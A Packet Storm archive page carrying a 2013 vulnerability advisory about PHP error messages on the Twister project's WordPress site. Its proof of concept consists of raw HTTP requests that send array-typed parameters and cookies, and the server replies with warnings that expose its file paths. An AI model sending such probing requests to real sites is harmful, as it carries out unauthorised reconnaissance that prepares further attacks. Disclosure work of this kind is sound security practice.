what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Twister Peer-To-Peer Microblogging Information Disclosure

Twister Peer-To-Peer Microblogging Information Disclosure
Posted Jan 13, 2013
Authored by Juan Carlos Garcia

The microblogging service at Twister.net suffers from multiple information disclosure issues related to errors. The researcher has contacted the vendor but they have not responded nor addressed the issues.

tags | exploit, info disclosure
SHA-256 | 0afe85a965975d68525129546ee2dfc71b571a0e7c4de9f2696fc6603ff1fc1f

Twister Peer-To-Peer Microblogging Information Disclosure

Change Mirror Download
========================================================================
TWISTER Peer-To-Peer microblogging Multiples Application Error Message ( and disclosing sensitive information)
========================================================================

TIME-LINE VULNERABILITY

Multiples Advisories but Not Response Not Fixed

-----------------
Alerts summary
-----------------


Application error message
**********************

/

author

cat

comment_author_email_46104838c3366e1644fd983230bdf8c5

comment_author_url_46104838c3366e1644fd983230bdf8c5

feed

m

s

wordpress_46104838c3366e1644fd983230bdf8c5

wordpress_logged_in_46104838c3366e1644fd983230bdf8c5

/wp-comments-post.php

author

comment

email

url

/wp-login.php

comment_author_email_46104838c3366e1644fd983230bdf8c5

comment_author_url_46104838c3366e1644fd983230bdf8c5

redirect_to

user_email

user_login

wordpress_46104838c3366e1644fd983230bdf8c5

wordpress_logged_in_46104838c3366e1644fd983230bdf8c5


I. VULNERABILITY
-------------------------

#Title: TWISTER.NET Multiples Application Error Message ( disclose sensitive information)

#Vendor:http://www.twister.net.co

#Author:Juan Carlos García (@secnight)

#Verified: Francisco Moraga (@BTShell)

#http://asap-sec.com


II. DESCRIPTION
-------------------------

Twister Peer-to-peer microblogging is the fully decentralized P2P microblogging
platform leveraging from the free software implementations of Bitcoin and BitTorrent protocols.


III. PROOF OF CONCEPT
-------------------------

--Attack details---

Application error message
-------------------------

Vulnerability description
*************************

This page contains an error/warning message that may disclose sensitive information.

The message can also contain the location of the file that produced the unhandled exception.


Affected items
---------------
/
/wp-comments-post.php
/wp-login.php


Cookie input comment_author_email_46104838c3366e1644fd983230bdf8c5 was set to sample%40email.tst

Error message found:


<b>Warning</b>: trim() expects parameter 1 to be string, array given in <b>/home/content/68/11448068/html/wp-includes/plugin.php</b> on line <b>199</b><br />


URL encoded GET input author was set to 1

Error message found:

<b>Warning</b>: urldecode() expects parameter 1 to be string, array given in <b>/home/content/68/11448068/html/wp-includes/query.php</b> on line <b>2519</b><br />

GET /?author[$secnight]=1&feed=rss2 HTTP/1.1

Cookie: comment_author_46104838c3366e1644fd983230bdf8c5=1;
comment_author_email_46104838c3366e1644fd983230bdf8c5=sample%40email.tst;
comment_author_url_46104838c3366e1644fd983230bdf8c5=http%3A%2F%2F1;
wordpress_test_cookie=WP+Cookie+check;
wordpress_logged_in_46104838c3366e1644fd983230bdf8c5=+; wordpress_46104838c3366e1644fd983230bdf8c5=+;
wordpress_sec_46104838c3366e1644fd983230bdf8c5=+;
wordpressuser_46104838c3366e1644fd983230bdf8c5=+; wordpresspass_46104838c3366e1644fd983230bdf8c5=+

X-Pingback: http://twister.net.co/xmlrpc.php
Host: twister.net.co
Connection: Keep-alive
Accept-Encoding: gzip,deflate


URL encoded GET input cat was set to 1

Error message found:

<b>Warning</b>: urldecode() expects parameter 1 to be string, array given in <b>/home/content/68/11448068/html/wp-includes/query.php</b> on line <b>1771</b><br />


GET /?cat[$secnight]=1 HTTP/1.1

Cookie: comment_author_46104838c3366e1644fd983230bdf8c5=1; comment_author_email_46104838c3366e1644fd983230bdf8c5=sample%40email.tst;
comment_author_url_46104838c3366e1644fd983230bdf8c5=http%3A%2F%2F1; wordpress_test_cookie=WP+Cookie+check;
wordpress_logged_in_46104838c3366e1644fd983230bdf8c5=+; wordpress_46104838c3366e1644fd983230bdf8c5=+;
wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpressuser_46104838c3366e1644fd983230bdf8c5=+;
wordpresspass_46104838c3366e1644fd983230bdf8c5=+

Host: twister.net.co
Connection: Keep-alive
Accept-Encoding: gzip,deflate



Cookie input comment_author_url_46104838c3366e1644fd983230bdf8c5 was set to http%3A%2F%2F1

Error message found:

<b>Warning</b>: strip_tags() expects parameter 1 to be string, array given in <b>/home/content/68/11448068/html/wp-includes/formatting.php</b> on line <b>3261</b><br />




GET / HTTP/1.1

Cookie: comment_author_46104838c3366e1644fd983230bdf8c5=1; comment_author_email_46104838c3366e1644fd983230bdf8c5=sample%40email.tst;
comment_author_url_46104838c3366e1644fd983230bdf8c5[]=http%3A%2F%2F1; wordpress_test_cookie=WP+Cookie+check;
wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+;
wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+;
wordpress_logged_in_46104838c3366e1644fd983230bdf8c5=+; wordpress_46104838c3366e1644fd983230bdf8c5=+;
wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpressuser_46104838c3366e1644fd983230bdf8c5=+;
wordpresspass_46104838c3366e1644fd983230bdf8c5=+

Referer: http://twister.net.co:80/
Host: twister.net.co
Connection: Keep-alive
Accept-Encoding: gzip,deflate


URL encoded GET input feed was set to 1

Error message found:

<b>Warning</b>: strpos() expects parameter 1 to be string, array given in <b>/home/content/68/11448068/html/wp-includes/class-wp.php</b> on line <b>331</b><br />


GET /?author=1&feed[$secnight]=1 HTTP/1.1

Cookie: comment_author_46104838c3366e1644fd983230bdf8c5=1; comment_author_email_46104838c3366e1644fd983230bdf8c5=sample%40email.tst;
comment_author_url_46104838c3366e1644fd983230bdf8c5=http%3A%2F%2F1; wordpress_test_cookie=WP+Cookie+check;
wordpress_logged_in_46104838c3366e1644fd983230bdf8c5=+; wordpress_46104838c3366e1644fd983230bdf8c5=+;
wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpressuser_46104838c3366e1644fd983230bdf8c5=+;
wordpresspass_46104838c3366e1644fd983230bdf8c5=+

Host: twister.net.co


Cookie input comment_author_email_46104838c3366e1644fd983230bdf8c5 was set to sample%40email.tst

Error message found:

<b>Warning</b>: trim() expects parameter 1 to be string, array given in <b>/home/content/68/11448068/html/wp-includes/plugin.php</b> on line <b>199</b><br />


GET /wp-login.php HTTP/1.1

Cookie: comment_author_46104838c3366e1644fd983230bdf8c5=1;
comment_author_email_46104838c3366e1644fd983230bdf8c5[]=sample%40email.tst;
comment_author_url_46104838c3366e1644fd983230bdf8c5=http%3A%2F%2F1; wordpress_test_cookie=WP+Cookie+check;
wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+;
wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+;
wordpress_logged_in_46104838c3366e1644fd983230bdf8c5=+; wordpress_46104838c3366e1644fd983230bdf8c5=+;
wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpressuser_46104838c3366e1644fd983230bdf8c5=+; wordpresspass_46104838c3366e1644fd983230bdf8c5=+

Referer: http://twister.net.co:80/

Host: twister.net.co

Etc
Etc
Etc
.
.
.


IV. BUSINESS IMPACT
-------------------------

The impact of this vulnerability:

The error messages disclose sensitive information. This information can be used to launch further attacks.


V SOLUTION
------------------------

Pentesting, Review and Write Secure Code.


VI. CREDITS
-------------------------

This vulnerability has been discovered

by

Juan Carlos García(@secnight)

Verified by

Francisco Moraga (@BTShell)

ASAP-SEC Team Members

Security As Soon As Possible (@Asap_Sec)


VII. LEGAL NOTICES
-------------------------

The Author accepts no responsibility for any damage
caused by the use or misuse of this information.
Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    27 Files
  • 13
    Aug 13th
    18 Files
  • 14
    Aug 14th
    50 Files
  • 15
    Aug 15th
    33 Files
  • 16
    Aug 16th
    23 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close